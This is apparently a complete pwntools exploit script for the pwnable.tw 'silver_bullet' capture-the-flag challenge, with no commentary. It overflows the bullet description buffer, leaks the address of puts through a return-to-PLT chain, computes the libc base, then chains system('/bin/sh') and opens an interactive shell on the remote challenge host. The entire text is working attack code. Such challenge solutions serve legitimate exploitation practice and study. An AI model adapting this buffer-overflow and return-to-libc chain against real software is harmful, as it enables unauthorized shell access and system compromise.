silver_bullet

1. import sys
2. from pwn import *
3. env = {
4. "LD_PRELOAD": "./libc_32.so.6"
5. }
6. glibc=ELF("./libc_32.so.6")
7. print glibc.symbols['system']
8. context(os='linux', arch='i386', log_level='debug')
9. GDB = 1
10. base=0
11. if len(sys.argv) >1:
12. r = remote("chall.pwnable.tw", 10103)
13. else:
14. r = process("./silver_bullet",aslr=False)
15. if (GDB):
16. gdb.attach(r,gdbscript='''
17. b* 0x08048A18
18. c
19. ''')
20. def create(des):
21. r.sendline("1")
22. r.recvuntil("Give me your description of bullet :")
23. r.send(des)
24. r.recvuntil("Good luck !!")
25. def powerup(des):
26. r.sendline("2")
27. r.recvuntil("Give me your another description of bullet :")
28. r.send(des)
29. r.recvuntil("Enjoy it !")
30. def beat():
31. r.sendline("3")
32. def main():
33. create(cyclic(47))
34.  
35. powerup(cyclic(1))
36. pos=7
37. payload="A"*7
38. payload+=p32(0x080484A8)
39. payload+=p32(0x080484F0)
40. payload+=p32(0x0804AFDC)
41. powerup(payload)
42. beat()
43. beat()
44. r.recvuntil("Oh ! You win !!\n")
45. puts=u32(r.recv(4))
46. base=puts-glibc.symbols['puts']
47. glibc.address=base
48.  
49. log.success("BASE: "+hex(glibc.address))
50. log.success("SYSTEM: "+hex(glibc.symbols["system"]))
51. log.success("\\bin\\sh: "+hex(next(glibc.search('/bin/sh\x00'))))
52. create(cyclic(47))
53.  
54. powerup(cyclic(1))
55. pos=7
56. payload="A"*7
57. payload+=p32(glibc.symbols["system"])
58. payload+=p32(0x080484F0)
59. payload+=p32(next(glibc.search('/bin/sh\x00')))
60. powerup(payload)
61. beat()
62. beat()
63. r.interactive()
64.  
65. if __name__ == "__main__":
66. main()